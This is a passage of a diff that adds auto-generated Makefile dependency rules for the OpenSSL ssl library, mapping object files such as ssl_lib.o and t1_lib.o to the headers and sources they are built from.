+s3_srvr.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s3_srvr.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+s3_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s3_srvr.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s3_srvr.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s3_srvr.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s3_srvr.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s3_srvr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s3_srvr.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s3_srvr.o: ../include/openssl/x509_vfy.h kssl_lcl.h s3_srvr.c ssl_locl.h
+ssl_algs.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_algs.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_algs.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_algs.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_algs.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_algs.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_algs.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_algs.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_algs.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_algs.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_algs.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_algs.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_algs.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_algs.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_algs.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_algs.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_algs.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_algs.c
+ssl_algs.o: ssl_locl.h
+ssl_asn1.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/asn1_mac.h
+ssl_asn1.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+ssl_asn1.o: ../include/openssl/crypto.h ../include/openssl/dsa.h
+ssl_asn1.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssl_asn1.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssl_asn1.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssl_asn1.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssl_asn1.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssl_asn1.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssl_asn1.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssl_asn1.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssl_asn1.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+ssl_asn1.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+ssl_asn1.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+ssl_asn1.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+ssl_asn1.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+ssl_asn1.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+ssl_asn1.o: ../include/openssl/x509_vfy.h ssl_asn1.c ssl_locl.h
+ssl_cert.o: ../crypto/o_dir.h ../e_os.h ../include/openssl/asn1.h
+ssl_cert.o: ../include/openssl/bio.h ../include/openssl/bn.h
+ssl_cert.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ssl_cert.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+ssl_cert.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_cert.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_cert.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_cert.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_cert.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_cert.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_cert.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_cert.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_cert.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_cert.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_cert.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_cert.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_cert.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_cert.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_cert.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ssl_cert.o: ../include/openssl/x509v3.h ssl_cert.c ssl_locl.h
+ssl_ciph.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_ciph.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_ciph.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_ciph.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_ciph.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_ciph.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_ciph.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_ciph.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_ciph.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_ciph.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_ciph.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_ciph.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_ciph.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_ciph.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_ciph.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_ciph.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_ciph.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_ciph.c
+ssl_ciph.o: ssl_locl.h
+ssl_conf.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_conf.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ssl_conf.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+ssl_conf.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_conf.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_conf.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_conf.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_conf.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_conf.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_conf.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_conf.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_conf.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_conf.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_conf.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_conf.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_conf.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_conf.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_conf.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_conf.c
+ssl_conf.o: ssl_locl.h
+ssl_err.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_err.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_err.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssl_err.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssl_err.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssl_err.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssl_err.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssl_err.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssl_err.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssl_err.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssl_err.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_err.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_err.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_err.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_err.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_err.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_err.c
+ssl_err2.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_err2.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_err2.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssl_err2.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssl_err2.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssl_err2.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssl_err2.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssl_err2.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssl_err2.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssl_err2.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssl_err2.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_err2.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_err2.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_err2.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_err2.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_err2.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_err2.c
+ssl_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_lib.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ssl_lib.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+ssl_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_lib.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ssl_lib.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssl_lib.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssl_lib.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssl_lib.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+ssl_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ssl_lib.o: ../include/openssl/x509v3.h kssl_lcl.h ssl_lib.c ssl_locl.h
+ssl_rsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_rsa.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_rsa.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_rsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_rsa.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_rsa.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_rsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_rsa.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_rsa.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_rsa.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_rsa.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_rsa.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_rsa.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_rsa.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_rsa.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_rsa.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_rsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_rsa.o: ssl_rsa.c
+ssl_sess.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_sess.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_sess.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_sess.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_sess.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_sess.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_sess.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_sess.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_sess.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_sess.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_sess.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+ssl_sess.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+ssl_sess.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+ssl_sess.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+ssl_sess.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+ssl_sess.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+ssl_sess.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+ssl_sess.o: ../include/openssl/x509_vfy.h ssl_locl.h ssl_sess.c
+ssl_stat.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_stat.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_stat.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_stat.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_stat.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_stat.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_stat.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_stat.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_stat.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_stat.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_stat.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_stat.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_stat.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_stat.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_stat.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_stat.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_stat.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_stat.o: ssl_stat.c
+ssl_txt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_txt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_txt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_txt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_txt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_txt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_txt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_txt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_txt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_txt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_txt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_txt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_txt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_txt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_txt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_txt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_txt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_txt.o: ssl_txt.c
+ssl_utst.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_utst.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_utst.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_utst.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_utst.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_utst.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_utst.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_utst.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_utst.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_utst.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_utst.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_utst.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_utst.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_utst.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_utst.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_utst.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_utst.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_utst.o: ssl_utst.c
+t1_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_clnt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_clnt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_clnt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_clnt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_clnt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_clnt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_clnt.o: ../include/openssl/x509_vfy.h ssl_locl.h t1_clnt.c
+t1_enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_enc.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_enc.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_enc.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_enc.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_enc.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_enc.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+t1_enc.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+t1_enc.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+t1_enc.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+t1_enc.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+t1_enc.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+t1_enc.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_enc.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_enc.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_enc.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_enc.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_enc.o: t1_enc.c
+t1_ext.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_ext.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_ext.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_ext.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_ext.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_ext.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_ext.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_ext.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_ext.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_ext.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_ext.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_ext.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_ext.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_ext.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_ext.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_ext.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_ext.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_ext.o: t1_ext.c
+t1_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_lib.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+t1_lib.o: ../include/openssl/crypto.h ../include/openssl/dsa.h
+t1_lib.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+t1_lib.o: ../include/openssl/err.h ../include/openssl/evp.h
+t1_lib.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+t1_lib.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+t1_lib.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+t1_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_lib.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_lib.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_lib.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_lib.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_lib.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_lib.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_lib.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_lib.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h ssl_locl.h
+t1_lib.o: t1_lib.c
+t1_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_meth.o: t1_meth.c
+t1_reneg.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_reneg.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_reneg.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_reneg.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_reneg.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_reneg.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_reneg.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_reneg.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_reneg.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_reneg.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_reneg.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_reneg.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_reneg.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_reneg.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_reneg.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_reneg.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_reneg.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_reneg.o: t1_reneg.c
+t1_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_srvr.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_srvr.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_srvr.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_srvr.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_srvr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_srvr.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_srvr.o: ../include/openssl/x509_vfy.h ssl_locl.h t1_srvr.c
+t1_trce.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_trce.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_trce.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_trce.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_trce.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_trce.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_trce.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_trce.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_trce.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_trce.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_trce.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_trce.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_trce.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_trce.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_trce.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_trce.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_trce.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_trce.o: t1_trce.c
+tls_srp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+tls_srp.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
